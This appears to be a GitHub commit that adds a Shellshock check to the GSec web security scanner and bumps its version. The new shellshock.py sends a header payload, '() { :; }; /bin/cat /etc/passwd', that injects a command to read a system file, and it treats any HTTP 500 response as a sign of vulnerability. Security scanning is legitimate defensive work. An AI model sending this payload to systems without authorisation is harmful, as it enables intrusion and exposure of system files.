added shellshock vulnerability scanner

gotr00t0day · Aug 15, 2022 · 6e1ad53 · 6e1ad53
1 parent 260c10c
commit 6e1ad53
Show file tree

Hide file tree

Showing 3 changed files with 17 additions and 2 deletions.
diff --git a/README.md b/README.md
@@ -6,7 +6,7 @@ Web Security Scanner
 
 
               ,~,
-             ((()-                   - GSec v0.9
+             ((()-                   - GSec v0.10
              -''-.                   - by c0deninja 
             (\  /\)                  - @gotr00t0day (Instagram)
       ~______\) | `\

diff --git a/exploits/shellshock.py b/exploits/shellshock.py
@@ -0,0 +1,13 @@
+from colorama import Fore
+import requests
+
+user_agent = "() { :; }; /bin/cat /etc/passwd"
+header = {"User-Agent": user_agent}
+
+
+def shellshock_scan(domain: str) -> str:
+    res = requests.get(domain, verify=False, headers=header)
+    if res.status_code == 500:
+        print(f"{Fore.MAGENTA}[+] {Fore.CYAN}-{Fore.WHITE} Shellshock: {Fore.GREEN}Might be vulnerable!")
+    else:
+        pass
diff --git a/gsec.py b/gsec.py
@@ -3,6 +3,7 @@
 from utils import portscanner, loginscanner, techscanner, cmsscanner, passive_recon
 from plugins import phpcheck, optionscheck
 from vuln_db import hostheader_injection, nuclei_vulns
+from exploits import shellshock
 import argparse
 import subprocess
 import os
@@ -23,7 +24,7 @@
 {Fore.RESET}
 
               ,~,
-             ((()-                   - GSec beta-v0.9
+             ((()-                   - GSec beta-v0.10
              -''-.                   - by c0deninja 
             (\  /\)                  - @gotr00t0day (Instagram)
       ~______\) | `\\
@@ -93,6 +94,7 @@ def commands(cmd):
         techscanner.Tech(args.target)
         nuclei_vulns.nuclei_nginx_scan(args.target)
         nuclei_vulns.nuclei_cve_scan(args.target)
+        shellshock.shellshock_scan(args.target)
         loginscanner.admin_list(args.target)
         hostheader_injection.host_header_injection(args.target)
         print("\n")